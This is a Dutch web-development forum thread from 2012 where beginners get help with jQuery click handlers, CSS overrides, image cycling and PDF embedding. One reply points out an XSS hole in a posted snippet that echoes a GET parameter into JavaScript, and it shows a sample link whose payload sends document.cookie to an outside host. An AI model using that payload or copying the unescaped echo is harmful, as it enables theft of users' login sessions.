Ik doe m'n best, maar ik ben echt net komen kijken. Vind het al heel wat dat ik HTML, PHP, JS kan combineren. Ik struikel alleen vaak over de simpele dingen.quote:Op maandag 26 november 2012 20:02 schreef Scorpie het volgende:
Noobies wat meer hun best doen pro's wat minder haten en iedereen blij.
Ik ga zo wel even posten wat ik ervan gemaakt heb, mogen jullie het weer afblaffen.quote:Op maandag 26 november 2012 19:00 schreef Merkie het volgende:
[..]
Hier had ik al de oplossing gepost he, voor de duidelijkheid.
Dat je struikelt over de simpelste dingen, komt omdat je niet de tijd neemt om de technologiën die je hanteert echt te doorgronden. Je wil vanaf niks in een paar weken gelijk iets bouwen, dat gaat gewoon niet.quote:Op maandag 26 november 2012 20:07 schreef pascal08 het volgende:
[..]
Ik doe m'n best, maar ik ben echt net komen kijken. Vind het al heel wat dat ik HTML, PHP, JS kan combineren. Ik struikel alleen vaak over de simpele dingen.
Je struikelt omdat je probeert te rennen. Voordat je kunt lopen en daarna kunt rennen die je te kunnen kruipen.quote:Op maandag 26 november 2012 20:07 schreef pascal08 het volgende:
[..]
Ik doe m'n best, maar ik ben echt net komen kijken. Vind het al heel wat dat ik HTML, PHP, JS kan combineren. Ik struikel alleen vaak over de simpele dingen.
Weet ik ook wel, maar het is niet de moeite waard om alles te doorgronden voor mijn doel. Zoals het nu gaat, met een beetje hulp van dit forum kom ik er wel. Lekker boeien of het dan niet perfect is, als het maar doet wat het moet doen.quote:Op maandag 26 november 2012 20:19 schreef Tijn het volgende:
[..]
Dat je struikelt over de simpelste dingen, komt omdat je niet de tijd neemt om de technologiën die je hanteert echt te doorgronden. Je wil vanaf niks in een paar weken gelijk iets bouwen, dat gaat gewoon niet.
Deze kan zo in het rijtje Cruijffiaanse uitspraken.quote:Op maandag 26 november 2012 20:39 schreef Scorpie het volgende:
[..]
Je struikelt omdat je probeert te rennen. Voordat je kunt lopen en daarna kunt rennen die je te kunnen kruipen.
Je moet zelf weten hoe je het aanpakt, maar er wordt al zoveel geprutst op het web dat professionele ontwikkelaars er soms een beetje moedeloos van worden als iemand er weer een potje van maakt. Natuurlijk kun je hier je vragen kwijt, maar probeer in elk geval een beetje achtergrondinformatie in te winnen over de onderwerpen waar je niet uit komt, want weten waar je mee bezig bent is de beste manier om problemen te voorkomen.quote:Op maandag 26 november 2012 20:59 schreef pascal08 het volgende:
[..]
Weet ik ook wel, maar het is niet de moeite waard om alles te doorgronden voor mijn doel. Zoals het nu gaat, met een beetje hulp van dit forum kom ik er wel. Lekker boeien of het dan niet perfect is, als het maar doet wat het moet doen.
Dat snap ik volledig. Als mensen een potje maken van mijn vakgebied kan ik ook heel boos worden. Het is vaak lachwekkend om te zien hoe sommige mensen te werk gaan. Echter moet je niet vergeten dat dit om een privé-projectje gaat waar het woord "professioneel" in de verste verte niet te bekennen valt. Ik hoopte hier gewoon simpele, maar doeltreffende oplossingen te vinden van mensen die wél weten hoe je een probleem professioneel oplost.quote:Op maandag 26 november 2012 21:08 schreef Tijn het volgende:
[..]
Je moet zelf weten hoe je het aanpakt, maar er wordt al zoveel geprutst op het web dat professionele ontwikkelaars er soms een beetje moedeloos van worden als iemand er weer een potje van maakt. Natuurlijk kun je hier je vragen kwijt, maar probeer in elk geval een beetje achtergrondinformatie in te winnen over de onderwerpen waar je niet uit komt, want weten waar je mee bezig bent is de beste manier om problemen te voorkomen.
Dat dacht ik ook.quote:Op maandag 26 november 2012 21:28 schreef Tijn het volgende:
Dat er veel amateurs zijn die met veel enthousiasme en plezier hun best doen om iets te ontwikkelen op het web, is ook iets waar professionals begrip voor moeten kunnen opbrengen. Het feit dat elke gebruiker van het web zonder al teveel drempels ook zelf iets kan ontwikkelen, is juist de kracht en de charme van het hele systeem.
Dat geeft je wel de beste garantie dat het ook nog voor iedereen gewoon leesbaar blijft. Wat toch uiteindelijk het allerbelangrijkste is.quote:Op dinsdag 27 november 2012 23:08 schreef picodealion het volgende:
Hmm, mooie oplossing opzich, maar ik denk dat ik dan inderdaad liever voor een onsemantisch spannetje ga.
En wat zie je als je dan het puntje selecteert?quote:Op donderdag 29 november 2012 22:22 schreef pascal08 het volgende:
[..]
Bedoel je Element Inspect van Chrome?Ja, die gebruik ik.
Het puntje kan ik niet selecteren. Het verschijnt altijd op een bepaalde hoogte boven de cursor bij het klikken.quote:Op donderdag 29 november 2012 22:23 schreef Tijn het volgende:
[..]
En wat zie je als je dan het puntje selecteert?
Weet je dat zeker? Heb je de gegenereerde HTML bekeken?quote:Op donderdag 29 november 2012 22:23 schreef pascal08 het volgende:
[..]
Het puntje kan ik niet selecteren.
Ik wil straks met jQuery gegevens versturen. Kan dat ook anders dan? Waarom is deze plugin er dan?quote:Op donderdag 29 november 2012 22:24 schreef picodealion het volgende:
Waarom heb je hier überhaupt jQuery voor nodig? Dit kan toch gewoon in CSS?
Ja, die heb ik bekeken. Er valt mij niets vreemds op. Ik zal nu kijken of ik het ook kan triggeren met Firefox.quote:Op donderdag 29 november 2012 22:25 schreef Tijn het volgende:
[..]
Weet je dat zeker? Heb je de gegenereerde HTML bekeken?
Anders is het misschien een glitch. Heb je het met andere browsers ook?
Nee, dat snap ik. Ik hoopte dat het een bekend probleem is. Zonder code wordt het natuurlijk gewoon gokken als je dit probleem niet eerder hebt gezien. Ik zal eens kijken of ik het kan reproduceren in een fiddle, momentje.quote:Op donderdag 29 november 2012 22:32 schreef Tijn het volgende:
Ik zou toch even goed kijken of er niet een element is dat daarvoor zorgt. Anders zit er weinig anders op dan het online te zetten zodat we kunnen meekijken, want op de gok lossen we natuurlijk niks op
Ik wist ten eerste niet hoe ik mijn layout wilde gaan maken, dus dit bracht me op een goed idee. Ten tweede weet ik hoe ik met jQuery gegevens moet doorsturen, zodat ik een query kan maken die de juiste gegevens ophaalt uit m'n database. En ten derde scheelde het me wat tijd, want ik hoef nu niet zelf m'n CSS te maken. Ik zag er dus alleen maar voordelen in. Waarom vraag je dat dan?quote:Op donderdag 29 november 2012 22:36 schreef Tijn het volgende:
Ik begrijp trouwens ook niet helemaal waarom je hier zo'n plugin voor nodig hebt.
Het lijkt me nogal simpel om dit zelf te maken met een paar regeltjes CSS en een jQuery eventhandler voor de blokjes. Ik zou daar geen plugin voor willen includen op m'n website.quote:
Ik gebruik jQuery UI toch al, dus dan is het toch handiger om deze plugin te gebruiken in plaats van het zelf te schrijven. Daarnaast vind ik jQuery wel fijn. Alles is voorgekauwd en het scheelt mij als beginner een hoop tijd.quote:Op donderdag 29 november 2012 22:46 schreef Tijn het volgende:
[..]
Het lijkt me nogal simpel om dit zelf te maken met een paar regeltjes CSS en een jQuery eventhandler voor de blokjes. Ik zou daar geen plugin voor willen includen op m'n website.
Ik vind het wel een uitkomst. Ik haal er een hele hoop ideeën vandaan en het werkt altijd meteen. Wellicht is de code zelf schrijven efficiënter voor de website, maar dan ben ik in 2025 nog niet klaar.quote:Op donderdag 29 november 2012 22:53 schreef Tijn het volgende:
Met jQuery zelf is natuurlijk niks mis, dat gebruik ik ook altijd.
Maar jQueryUI vind ik persoonlijk wat minder.
Hoe zou jij het doen dan? Het gaat alleen om het principe van selecteren/geselecteerd blijven en deselecteren/gedeselecteerd blijven.quote:Op donderdag 29 november 2012 23:01 schreef Tijn het volgende:
Ik zie niks hoor. Maar het zal dat selectieblokje met die stippellijntjes wel zijn dat blijft hangen ofzo.
Ik zou dat eerlijk gezegd sowieso niet doen, dat selecteren met zo'n vakje. Dat zie je op andere sites ook nooit.
Wat zou dat schelen in ms of is het puur omdat je code er kleiner van wordt?quote:Op donderdag 29 november 2012 23:13 schreef Tijn het volgende:
Gewoon onclick een class "selected" geven of ontnemen.
Da's waar.quote:Op donderdag 29 november 2012 23:16 schreef Tijn het volgende:
Het scheelt vooral dat je niet zo'n raar puntje hebt staan op willekeurige momenten
| 1 2 3 | <div class=" (selected of niks) " style="float:left; margin: 2px; padding: 0px; width: 80px;"> // inhoud </div> |
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 | <!DOCTYPE html> <html> <head> <title>Voorbeeld van klikbare blokjes</title> <link rel="stylesheet" href="style.css" type="text/css" /> </head> <body> <h1>omg klikbare blokjes</h1> <ul id="selectable"> <li data-id="1">blokje 1</li> <li data-id="2">blokje 2</li> <li data-id="3">blokje 3</li> <li data-id="4">blokje 4</li> <li data-id="5">blokje 5</li> <li data-id="6">blokje 6</li> <li data-id="7">blokje 7</li> <li data-id="8">blokje 8</li> <li data-id="9">blokje 9</li> </ul> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script> <script src="script.js"></script> </body> </html> |
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 | body { font-family: sans-serif; text-align: center; } #selectable { list-style-type: none; } #selectable li { float: left; width: 80px; height: 80px; background-color: #eee; border: 1px solid #888; border-radius: 3px; margin: 5px; padding: 10px; cursor: pointer; } #selectable li:hover { background-color: #fff; } #selectable li.selected { background-color: #f8f89f; } |
| 1 2 3 4 5 | $(document).ready(function(){ $('#selectable li').live('click', function(){ $(this).toggleClass('selected'); }); }); |
Holy shit, even kijken.quote:Op donderdag 29 november 2012 23:34 schreef Tijn het volgende:
Is zoiets niet wat je wil?
[ code verwijderd ]
style.css:
[ code verwijderd ]
script.js:
[ code verwijderd ]
Wel een heel mooi voorbeeldje.quote:Op donderdag 29 november 2012 23:42 schreef Tijn het volgende:
Het is maar een voorbeeldje hoor.
In de click eventhandler (waar nu alleen toggleClass() wordt aangeroepen) zou je ook een Ajax call kunnen doen als je nog communicatie met je server wil na het aanklikken van een blokje.
Juist, dan kan ik natuurlijk met PHP daar de id laten echoën die relevant is voor mijn zoekactie.quote:Op donderdag 29 november 2012 23:44 schreef Tijn het volgende:
Nu nergens voor, maar ik kan me voorstellen dat je zoiets nodig hebt om je server te laten weten om welk blokje het gaat.
Hmm... oké. Ik heb er veel werk aan gehad omdat ik meerdere sliders wilde aansturen vanuit één eventhandler (?), Uiteindelijk is het me gelukt, zonder dat er rare glitches zichtbaar zijn. Bovendien bestaat het systeem uit meer dan 50 sliders en werkt het onder alle omstandigheden toch heel snel. Vandaar dat ik jQuery UI ook gelijk geweldig vond.quote:Op donderdag 29 november 2012 23:47 schreef Tijn het volgende:
Mja, waarschijnlijk wel. Het hangt er natuurlijk vanaf, als er een standaard plugin is die precies doet wat ik wil, dan gebruik ik dat gewoon. Maar als ik er enorm veel werk aan zou hebben om het aan te passen, dan is het waarschijnlijk sneller en beter om zelf te maken wat je hebben wil is mijn ervaring.
Ik snap niet helemaal wat je bedoelt.quote:Op donderdag 29 november 2012 23:54 schreef Tijn het volgende:
Ik gebruik ook wel eens een of twee componentjes van jQueryUI hoor. Maar voor zoiets simpels als dit begrijp ik niet waarom je een extra library zou willen includen.
Ik vermoedde het al toen jij het had over includen van componenten die je ook zelf kunt maken. Ik heb gewoon die hele meuk geïnclude.quote:Op vrijdag 30 november 2012 00:01 schreef Tijn het volgende:
http://jqueryui.com/download/
Hier kun je de componenten kiezen die je wil hebben. Als je alleen de dingen op je website zet die je ook daadwerkelijk gebruikt, scheelt dat zo enkele tientallen kilobytes. Zeker voor mensen met een mobiele verbinding kan dat best wat laadtijd schelen.
Omdat totals een array is. Dus totals[0]==null.quote:Op vrijdag 30 november 2012 09:29 schreef Deeltjesversneller het volgende:
[ code verwijderd ]
waarom levert (totals == null) false op?
| 1 2 3 | a [style*="color:#0000FF"] { color: green!important; } |
Geloof er niks van.quote:Op vrijdag 30 november 2012 09:37 schreef Deeltjesversneller het volgende:
was er al achter, toch bedankt voor de moeite!! heb me nu toch wat sjieks gemaakt zeg.
Het is al gelukt.quote:Op zaterdag 1 december 2012 14:41 schreef n8n het volgende:
die kleuren zijn inline gestyled dus dat wordt lastig om te overrulen
| 1 2 3 | a.username[style*="#0000FF"], a.tag[style*="#0000FF"] { color: #389ABE !important; } |
beterquote:Op zaterdag 1 december 2012 15:00 schreef Dimens het volgende:
[..]
Het is al gelukt.
[ code verwijderd ]
Met dank aan TwyLight.
Wat heb je zelf tot nu toe?quote:Op dinsdag 4 december 2012 13:30 schreef Laser. het volgende:
Wie kan mij even helpen met javascript?
Ik heb een div met id "content". Deze div moet de achtergrond "img_1.jpg" gebruiken.
Ik heb ergens op de pagina een button. Als je op deze button klikt dan moet de achtergrond naar "img_2.jpg" veranderen. Als je dan nog een keer klikt dan naar img_3 etc. Maar img_4 is de laatste en dan moet ie weer terug naar 1.
Als je op de button klikt roept ie de functie count(); aan.quote:
| 1 2 3 4 5 6 7 8 | <script type="text/javascript"> var img = 1; function count() { img = img + 1; document.getElementById("content").style.backgroundImage = "url(content/art/S3/S3_img1.jpg)"; } </script> |
| 1 | document.getElementById("content").style.backgroundImage = "url(content/art/S3/S3_img" + (img % 4) +".jpg)"; |
Neuh, gewoon %4 en bij 0 beginnen.quote:Op dinsdag 4 december 2012 13:41 schreef Catch22- het volgende:
[ code verwijderd ]
zoiets, kan ook % 3 of (img-1)%4 zijn.
quote:Op dinsdag 4 december 2012 13:34 schreef Laser. het volgende:
script type="text/javascript">var img = 1;function count() { img = img + 1; document.getElementById("content").style.backgroundImage = "url(content/art/S3/S3_img1.jpg)";}</script>
| 1 2 3 4 5 6 7 8 | <?php var img = 1; function count() { (img < 4) ? img = img++ : img = 1; document.getElementById("content").style.backgroundImage = "url(content/art/S3/S3_img"+img+".jpg)"; } ?> |
Netter dan de mijne.quote:Op dinsdag 4 december 2012 13:41 schreef Catch22- het volgende:
[ code verwijderd ]
zoiets, kan ook % 3 of (img-1)%4 zijn.
| 1 2 3 | <script type="text/javascript"> document.getElementById("content").style.backgroundImage = "url(content/art/S3/S3_img1.jpg)"; </script> |
| 1 2 3 4 5 6 7 8 9 | <script type="text/javascript"> var section = "S3"; var img = 1; function count() { img = img + 1; document.getElementById("art").style.backgroundImage = "url(content/art/"+section+"/"+section+"_img"+img+".jpg)"; if (img==4) img=0; } </script> |
| 1 | var section = "<?= $_GET["section"] ?>"; |
Ach, mensen klikken ook op dit soort pareltjes.quote:Op dinsdag 4 december 2012 15:24 schreef KomtTijd... het volgende:
Nu alleen nog mensen zo gek krijgen te klikken op zulks een link:
index.php?section=1;$.ajax({url:"mijnwebsite.cn?andermanslogingegevens="+document.cookie})
Er sterft altijd een beetje van mezelf als ik zulke dingen ziequote:javascript:__doPostBack('ctl00$ContentPlaceHolderPage$BottomPaging$PageButtonRepeater$ctl02$PageLinkButton','')
| 1 2 3 4 5 6 7 8 9 10 11 | $(document).ready(function(){ // index laden bij start $('#content').load('content/index.php'); // navigatie laden bij klikken $('ul#nav li a').click(function() { var page = $(this).attr('href'); $('#content').load('content/' + page + '.php'); return false; }); }); |
k had example F uit het eerste artikel aangehouden, zal nog even door de css kijken of ik misschien iets verkeerd heb aangepastquote:Op woensdag 5 december 2012 13:20 schreef Catch22- het volgende:
Even een flowtutorial lezen
http://www.alistapart.com/articles/css-floats-101/
http://www.alistapart.com/articles/css-positioning-101/
http://www.jquery4u.com/j(...)-pdf-viewer-plugins/quote:Op vrijdag 7 december 2012 14:12 schreef boem-dikkie het volgende:
Hier mensen ervaring met een simpel framework of plugin (jQuery of Javascript of zo) om een PDF te tonen in een pagina? Ik heb nu een iframe gebruikt maar dat is natuurlijk extreem ouderwets. Plus dat hij in Safari het al niet heel fijn doet, en (ondanks nog niet getest) Internet Explorer dit vast ook niet heel fijn vindt.
PDF.JS al even bekeken maar lijkt me wat lomp voor alleen een PDF tonen zonder knopjes e.d.
PDF.JS te lomp, gViewer zegt dat hij mijn document niet kan vinden. Zelfde error op de voorbeeldpagina, dus waarschijnlijk is de API veranderd? En PDFObject is kut, daar kun je opties aan meegeven die vervolgens helemaal niet werken.quote:Op vrijdag 7 december 2012 14:26 schreef donroyco het volgende:
[..]
http://www.jquery4u.com/j(...)-pdf-viewer-plugins/
Jammerquote:Op vrijdag 7 december 2012 14:44 schreef boem-dikkie het volgende:
[..]
PDF.JS te lomp, gViewer zegt dat hij mijn document niet kan vinden. Zelfde error op de voorbeeldpagina, dus waarschijnlijk is de API veranderd? En PDFObject is kut, daar kun je opties aan meegeven die vervolgens helemaal niet werken.
Ik heb met een iFrame geprobeerd en inmiddels getest in Internet Explorer 6, 7 en 8, Firefox, Chrome en Safari en in alle browsers nagelijk hetzelfde resultaat. Denk dat ik het maar gewoon bij een iframe houd.
| 1 2 3 4 5 6 7 8 | <div class="note grey" style="left:343px;top:284px;z-index:43" data-id="32"> Test test Test test Test test Test test <div class="author">Henk de Tank</div> </div> <div class="note red" style="left:629px;top:0px;z-index:45" data-id="31"> Doet ie het? <div class="author">Einzzzstein</div> </div> |
| 1 2 3 | $("div.note").dblclick(function(event) { alert($(event).data("id")); }) |
Nu ook een iFrame maar wel met de API van Google. Die doet het ook in Firefox, waar Firefox zonder plugins normaal vraagt of je de PDF wil openen of downloaden, in plaats van tonen op de pagina. Alle Internet Explorers ondersteunen de Google Docs API en Firefox, Chrome en Safari werken ook prima dus ik vind het mooi zo.quote:Op vrijdag 7 december 2012 15:29 schreef KomtTijd... het volgende:
Iframe is helemaal niet zo gek. Gewoon door de pdf-reader van de gebruiker af laten handelen.
Misschien (als je dat kunt detecteren) zou je zo'n JS-library als fallback kunnen gebruiken voor als de user geen in-browser PDF-reader heeft.
$(this) werkt sowieso wel mooi voor dit soort dingen.quote:Op zaterdag 8 december 2012 11:55 schreef picodealion het volgende:
Het was veel gemakkelijker. .data() doet precies wat jij wil dus mijn oplossing was overbodig. Je moet het alleen niet doen op $(event) maar gewoon op $(this).
this.dataset.id geeft overigens hetzelfde, heb je jQuery dus niet voor nodig, maar in IE8 en lager doet dat niks.
Thanksquote:Op zaterdag 8 december 2012 11:55 schreef picodealion het volgende:
Het was veel gemakkelijker. .data() doet precies wat jij wil dus mijn oplossing was overbodig. Je moet het alleen niet doen op $(event) maar gewoon op $(this).
this.dataset.id geeft overigens hetzelfde, heb je jQuery dus niet voor nodig, maar in IE8 en lager doet dat niks.
| Forum Opties | |
|---|---|
| Forumhop: | |
| Hop naar: | |